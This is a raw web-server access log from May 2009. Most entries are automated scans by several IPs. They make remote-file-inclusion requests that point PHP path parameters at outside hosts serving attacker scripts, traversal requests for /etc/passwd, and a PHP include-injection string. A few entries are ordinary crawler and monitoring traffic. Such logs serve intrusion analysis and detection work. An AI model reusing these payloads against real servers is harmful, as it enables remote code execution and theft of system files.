121.101.159.29 - - [13/May/2009:05:45:16 -0400] "GET /logs/access_log.Q108082700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
121.101.159.29 - - [13/May/2009:05:45:18 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
121.101.159.29 - - [13/May/2009:05:45:19 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.175.180.194 - - [13/May/2009:05:45:19 -0400] "GET ///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt???? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
209.175.180.194 - - [13/May/2009:05:45:19 -0400] "GET /logs///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt???? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
209.175.180.194 - - [13/May/2009:05:45:19 -0400] "GET /logs/access_log.Q108111600///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
209.175.180.194 - - [13/May/2009:05:45:19 -0400] "GET /logs/access_log.Q108100100///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
121.101.159.29 - - [13/May/2009:05:45:19 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.175.180.194 - - [13/May/2009:05:45:37 -0400] "GET /logs/access_log.Q108100100///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
209.175.180.194 - - [13/May/2009:05:45:37 -0400] "GET ///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
209.175.180.194 - - [13/May/2009:05:45:37 -0400] "GET /logs///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
209.175.180.194 - - [13/May/2009:05:45:37 -0400] "GET /logs/access_log.Q108111600///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
209.175.180.194 - - [13/May/2009:05:45:38 -0400] "GET ///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
209.175.180.194 - - [13/May/2009:05:45:39 -0400] "GET /logs/access_log.Q108100100///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
209.175.180.194 - - [13/May/2009:05:45:39 -0400] "GET /logs///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
209.175.180.194 - - [13/May/2009:05:45:39 -0400] "GET /logs/access_log.Q108111600///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
91.121.210.42 - - [13/May/2009:05:45:41 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
91.121.210.42 - - [13/May/2009:05:45:41 -0400] "GET /logs/access_log.Q108120800%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
91.121.210.42 - - [13/May/2009:05:45:41 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
207.57.79.26 - - [13/May/2009:05:45:41 -0400] "GET /logs/access_log.Q109041800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.825"
207.57.79.26 - - [13/May/2009:05:45:42 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.825"
207.57.79.26 - - [13/May/2009:05:45:42 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.825"
91.121.210.42 - - [13/May/2009:05:45:45 -0400] "GET /logs/access_log.Q109022700%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.30.79.49 - - [13/May/2009:05:46:03 -0400] "GET /logs/ HTTP/1.0" 200 1150 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
58.227.193.198 - - [13/May/2009:05:46:27 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
58.227.193.198 - - [13/May/2009:05:46:27 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.227.193.198 - - [13/May/2009:05:46:27 -0400] "GET /logs/access_log.Q109032800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.30.79.49 - - [13/May/2009:05:46:33 -0400] "GET /logs/error_log.Q108082700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.101.159.29 - - [13/May/2009:05:46:50 -0400] "GET /logs/access_log.Q108112400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
124.0.55.34 - - [13/May/2009:05:46:51 -0400] "GET /logs/access_log.Q108082900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
193.221.119.126 - - [13/May/2009:05:46:51 -0400] "GET /logs/access_log.Q108120700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [13/May/2009:05:46:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.221.119.126 - - [13/May/2009:05:47:06 -0400] "GET /logs/access_log.Q109032800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.228.155.80 - - [13/May/2009:05:47:11 -0400] "GET /logs/access_log.Q109020500//modules/xfsection/modify.php?dir_module=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
218.249.60.66 - - [13/May/2009:05:47:32 -0400] "GET /index.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
218.249.60.66 - - [13/May/2009:05:47:32 -0400] "GET /logs/access_log.Q108102900/index.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
218.249.60.66 - - [13/May/2009:05:47:32 -0400] "GET /logs/index.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
72.30.79.49 - - [13/May/2009:05:47:41 -0400] "GET /logs/access_log.Q109051300 HTTP/1.0" 200 307128 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.101.159.29 - - [13/May/2009:05:47:48 -0400] "GET /logs/access_log.Q108091000/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
193.221.119.126 - - [13/May/2009:05:48:43 -0400] "GET /logs/access_log.Q109032800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
193.221.119.126 - - [13/May/2009:05:48:43 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
193.221.119.126 - - [13/May/2009:05:48:43 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.165.73.157 - - [13/May/2009:05:48:51 -0400] "GET /logs/access_log.Q108122800%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:05:48:51 -0400] "GET /logs/access_log.Q108112900%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
216.117.191.71 - - [13/May/2009:05:49:03 -0400] "GET /logs/access_log.Q108120700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:05:49:03 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:05:49:03 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
72.30.79.49 - - [13/May/2009:05:48:46 -0400] "GET /logs/access_log.Q109051200 HTTP/1.0" 200 6040641 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.94.56.98 - - [13/May/2009:05:49:34 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.depo.org.pk/images/21/ts?? HTTP/1.0" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
72.30.79.49 - - [13/May/2009:05:49:34 -0400] "GET /logs/error_log.Q109050900 HTTP/1.0" 200 4206283 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
88.191.103.144 - - [13/May/2009:05:49:50 -0400] "GET /logs/access_log.Q108120700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.825"
88.191.103.144 - - [13/May/2009:05:49:50 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.825"
88.191.103.144 - - [13/May/2009:05:49:51 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.825"
72.30.79.49 - - [13/May/2009:05:49:34 -0400] "GET /logs/error_log.Q109050900 HTTP/1.0" 200 4206283 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [13/May/2009:05:50:04 -0400] "GET /logs/error_log.Q109051000 HTTP/1.0" 200 4370886 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
58.227.193.198 - - [13/May/2009:05:50:15 -0400] "GET /logs/access_log.Q108120700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
121.101.159.29 - - [13/May/2009:05:50:20 -0400] "GET /logs/access_log.Q108082700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
121.101.159.29 - - [13/May/2009:05:50:20 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
121.101.159.29 - - [13/May/2009:05:50:21 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
121.101.159.29 - - [13/May/2009:05:50:22 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
121.101.159.29 - - [13/May/2009:05:50:22 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
121.101.159.29 - - [13/May/2009:05:50:22 -0400] "GET /logs/access_log.Q108082700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
121.101.159.29 - - [13/May/2009:05:50:23 -0400] "GET /logs/access_log.Q108082700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
72.30.79.49 - - [13/May/2009:05:50:23 -0400] "GET /logs/error_log.Q109051300 HTTP/1.0" 200 329443 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.101.159.29 - - [13/May/2009:05:50:24 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
121.101.159.29 - - [13/May/2009:05:50:26 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
72.30.79.49 - - [13/May/2009:05:50:25 -0400] "GET /logs/error_log.Q109051300 HTTP/1.0" 200 330594 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
172.16.1.157 - - [13/May/2009:05:50:29 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:05:50:29 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:05:50:29 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
72.30.79.49 - - [13/May/2009:05:50:04 -0400] "GET /logs/error_log.Q109051000 HTTP/1.0" 200 4370886 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.135.14 - - [13/May/2009:05:50:31 -0400] "GET /logs/access_log.Q108120700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:05:50:32 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:05:50:32 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
121.101.159.29 - - [13/May/2009:05:50:33 -0400] "GET /logs/access_log.Q108112400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
208.112.87.9 - - [13/May/2009:05:50:46 -0400] "GET /http://oubkhammuseum.com/templates/idvop.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
85.114.132.122 - - [13/May/2009:05:50:56 -0400] "GET /logs/access_log.Q108111700//?path%5Bdocroot%5D=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:05:50:56 -0400] "GET //?path%5Bdocroot%5D=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:05:50:56 -0400] "GET /logs//?path%5Bdocroot%5D=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 200 1155 "-" "libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:05:51:00 -0400] "GET /logs/access_log.Q108111700//?path%5Bdocroot%5D=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
121.101.159.29 - - [13/May/2009:05:51:00 -0400] "GET /logs/access_log.Q108083100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.114.132.122 - - [13/May/2009:05:51:00 -0400] "GET //?path%5Bdocroot%5D=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:05:51:00 -0400] "GET /logs//?path%5Bdocroot%5D=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 200 1155 "-" "libwww-perl/5.805"
121.101.159.29 - - [13/May/2009:05:51:10 -0400] "GET /logs/access_log.Q108083100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
58.227.193.198 - - [13/May/2009:05:51:15 -0400] "GET /logs/error_log.Q108111800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
84.32.195.2 - - [13/May/2009:05:51:16 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
84.32.195.2 - - [13/May/2009:05:51:16 -0400] "GET /logs/access_log.Q108120800%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
84.32.195.2 - - [13/May/2009:05:51:16 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
121.101.159.29 - - [13/May/2009:05:51:25 -0400] "GET /logs/access_log.Q108083100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
202.89.33.167 - - [13/May/2009:05:51:29 -0400] "GET /logs/access_log.Q108103100//?_SERVER[DOCUMENT_ROOT]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:05:51:29 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 200 1155 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:05:51:29 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
84.32.195.2 - - [13/May/2009:05:51:29 -0400] "GET /logs/access_log.Q109022700%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.117.191.71 - - [13/May/2009:05:51:41 -0400] "GET /logs/access_log.Q109032800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.65"
172.16.1.157 - - [13/May/2009:05:51:45 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:05:51:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:05:51:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
202.89.33.167 - - [13/May/2009:05:51:48 -0400] "GET /logs/access_log.Q109010300//?_SERVER[DOCUMENT_ROOT]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [13/May/2009:05:51:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.114.132.122 - - [13/May/2009:05:52:11 -0400] "GET //?path%5Bdocroot%5D=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:05:52:11 -0400] "GET //?path%5Bdocroot%5D=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
208.112.87.9 - - [13/May/2009:05:52:17 -0400] "GET /logs/access_log.Q108090100/http://oubkhammuseum.com/templates/idvop.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
208.112.87.9 - - [13/May/2009:05:52:17 -0400] "GET /http://oubkhammuseum.com/templates/idvop.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
208.112.87.9 - - [13/May/2009:05:52:17 -0400] "GET /logs/http://oubkhammuseum.com/templates/idvop.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
208.112.87.9 - - [13/May/2009:05:52:24 -0400] "GET /logs/access_log.Q108092700/http://oubkhammuseum.com/templates/idvop.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
172.16.1.157 - - [13/May/2009:05:52:54 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:05:52:54 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:05:52:54 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
88.191.103.144 - - [13/May/2009:05:52:54 -0400] "GET /logs/access_log.Q109032800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.825"
202.89.33.167 - - [13/May/2009:05:53:25 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:05:53:25 -0400] "GET /logs/access_log.Q108103100//?_SERVER[DOCUMENT_ROOT]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:05:53:28 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 200 1155 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:05:53:31 -0400] "GET /logs/access_log.Q108103100%20%20//?_SERVER[DOCUMENT_ROOT]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.114.132.122 - - [13/May/2009:05:53:31 -0400] "GET /logs/access_log.Q108082000//?path%5Bdocroot%5D=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:05:53:39 -0400] "GET /logs/access_log.Q108082000//?path%5Bdocroot%5D=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
202.89.33.167 - - [13/May/2009:05:53:41 -0400] "GET /logs/access_log.Q109010300%20%20//?_SERVER[DOCUMENT_ROOT]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:05:53:41 -0400] "GET /logs/access_log.Q109010300//?_SERVER[DOCUMENT_ROOT]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.94.56.98 - - [13/May/2009:05:54:05 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.depo.org.pk/images/21/ts?? HTTP/1.0" 404 252 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
